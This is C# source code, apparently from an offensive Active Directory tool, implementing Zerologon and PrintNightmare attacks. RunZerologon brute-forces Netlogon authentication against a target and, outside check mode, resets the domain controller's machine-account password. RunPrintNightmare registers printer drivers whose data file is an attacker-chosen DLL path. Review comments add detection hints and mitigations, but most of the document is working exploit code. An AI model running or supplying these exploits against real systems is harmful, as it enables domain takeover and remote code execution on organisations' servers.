/// <summary>
/// Binds to <paramref name="target"/> over RPC and calls
/// <c>Tryzerologonenticate</c> up to <c>MAX_ATTEMPTS</c> times for
/// <paramref name="machineaccount"/>. On the first successful attempt it
/// either stops (mode "check") or goes on to call <c>ChangeDCPassword</c>.
/// </summary>
/// <param name="mode">
/// Compared with the exact string "check". Any other value reaches
/// <c>ChangeDCPassword</c> after a successful authentication attempt.
/// </param>
/// <param name="target">Host passed to <c>DCSync.CreateBinding</c>.</param>
/// <param name="machineaccount">Account name handed to both helper calls.</param>
/// <param name="auth">Authentication service constant forwarded to <c>DCSync.CreateBinding</c>.</param>
/// <param name="nullsession">Forwarded to <c>DCSync.CreateBinding</c> as its <c>nullsession</c> argument.</param>
/// <returns>
/// <c>true</c> when an attempt succeeds in "check" mode, or when
/// <c>ChangeDCPassword</c> returns <c>NTSTATUS.Success</c>; otherwise <c>false</c>.
/// </returns>
/// <remarks>
/// NOTE(review): only "check" mode is read-only. Every other mode value is
/// state-changing on the target (presumably a machine-account password change,
/// going by the helper name; confirm in <c>ChangeDCPassword</c>).
/// Defensive relevance: the loop produces a burst of authentication attempts
/// for one account over a single binding, so a run of failures followed by a
/// success and an account change is the sequence to alert on.
/// The binding handle is stored in the shared <c>rpcConn</c> field and is not
/// released in this method.
/// </remarks>
public static bool RunZerologon(string mode, string target, string machineaccount, int auth, bool nullsession)
{
    Console.Write("[*] ");

    rpcConn = DCSync.CreateBinding(target, null, auth, nullsession: nullsession);
    if (rpcConn == IntPtr.Zero)
    {
        Console.WriteLine("Error CreateBinding");
        return false;
    }

    NTSTATUS resolveStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());
    if (resolveStatus != NTSTATUS.Success)
    {
        Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)resolveStatus);
        return false;
    }

    for (int attempt = 0; attempt < MAX_ATTEMPTS; attempt++)
    {
        bool authenticated = Tryzerologonenticate(machineaccount);
        if (!authenticated)
        {
            // One '=' per failed attempt; the console line acts as a progress bar.
            Console.Write("=");
            continue;
        }

        Console.WriteLine("[*]");
        Console.WriteLine("[*] Authentication: Ok target vulnerable");

        // Check-only mode stops here without touching the account.
        if (mode.Equals("check"))
        {
            return true;
        }

        NTSTATUS changeStatus = ChangeDCPassword(machineaccount);
        if (changeStatus != NTSTATUS.Success)
        {
            // No retry after a failed password change: the run ends as a failure.
            return false;
        }

        Console.WriteLine("[*] Set password: Ok");
        return true;
    }

    return false;
}
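/// <summary>
/// Binds to <paramref name="target"/> over RPC with the supplied credentials,
/// sets the object UUID on the binding, looks up a driver directory with
/// <c>FindDriverPath</c>, and then makes up to two <c>AddPrinterDriver</c>
/// calls using a <c>DRIVER_INFO_2</c> whose data file is
/// <paramref name="exploit_path"/>.
/// </summary>
/// <param name="target">Host passed to <c>DCSync.CreateBinding</c>.</param>
/// <param name="exploit_path">
/// Backslash-separated path used as <c>pDataFile</c>; its last segment is the
/// third argument of the second <c>AddPrinterDriver</c> call.
/// </param>
/// <param name="authuser">User name forwarded to <c>DCSync.CreateBinding</c>.</param>
/// <param name="authdomain">Domain forwarded to <c>DCSync.CreateBinding</c>.</param>
/// <param name="authpassword">Password forwarded to <c>DCSync.CreateBinding</c> as a plain string.</param>
/// <param name="auth">Authentication service constant; defaults to <c>DCSync.RPC_C_AUTHN_GSS_NEGOTIATE</c>.</param>
/// <param name="altservice">Service name forwarded to <c>DCSync.CreateBinding</c>; defaults to "host".</param>
/// <returns><c>true</c> only when both <c>AddPrinterDriver</c> calls succeed; otherwise <c>false</c>.</returns>
/// <remarks>
/// NOTE(review): this method is state-changing on the target. It registers
/// printer drivers under random ten-character names, and nothing here removes
/// them afterwards. The binding is created with
/// <c>DCSync.RPC_C_IMP_LEVEL_DELEGATE</c>, and the handle stays in the shared
/// <c>rpcConn</c> field without being released here.
/// Defensive relevance: driver additions with short random names, and a data
/// file outside the normal driver store, are the artefacts to look for.
/// Disabling the spooler service where it is not needed and restricting
/// printer-driver installation to administrators are the usual mitigations
/// (general guidance, not derived from this file).
/// </remarks>
public static bool RunPrintNightmare(string target, string exploit_path, string authuser, string authdomain, string authpassword, int auth = DCSync.RPC_C_AUTHN_GSS_NEGOTIATE, string altservice = "host")
{
    Console.WriteLine("[*] ");

    rpcConn = DCSync.CreateBinding(target, altservice, auth, authuser, authdomain, authpassword, impersonationType: DCSync.RPC_C_IMP_LEVEL_DELEGATE);
    if (rpcConn == IntPtr.Zero)
    {
        Console.WriteLine("Error CreateBinding");
        return false;
    }

    NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());
    if (rpcStatus != NTSTATUS.Success)
    {
        Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus);
        return false;
    }

    rpcStatus = (NTSTATUS)RpcBindingSetObject(rpcConn, ref PAR_ObjectUUID);
    if (rpcStatus != NTSTATUS.Success)
    {
        // The message previously named RpcBindingSetOption, which is not the call
        // that failed; it now matches so logs point at the right step.
        Console.WriteLine("[x] Error RpcBindingSetObject {0}", (int)rpcStatus);
        return false;
    }

    string driverpath = FindDriverPath(rpcConn);
    driverpath += "\\unidrv.dll";
    Console.WriteLine("[*] DriverPath: {0}", driverpath);

    string environment = "Windows x64";
    DRIVER_INFO_2 dvi2 = new DRIVER_INFO_2
    {
        cVersion = 3,
        pDataFile = exploit_path,
        pEnvironment = environment,
        pDriverPath = driverpath,
        pName = RandomString(10)
    };

    // First call. What the third argument means is defined by AddPrinterDriver,
    // which is not visible in this block.
    if (!AddPrinterDriver(dvi2, rpcConn, "C:\\Windows\\System32\\kernelbase.dll"))
    {
        return false;
    }

    // Second call uses a fresh random name and the last path segment of exploit_path.
    dvi2.pName = RandomString(10);
    string[] p = exploit_path.Split('\\');
    if (AddPrinterDriver(dvi2, rpcConn, p[p.Length - 1]))
    {
        Console.WriteLine();
        return true;
    }

    return false;
}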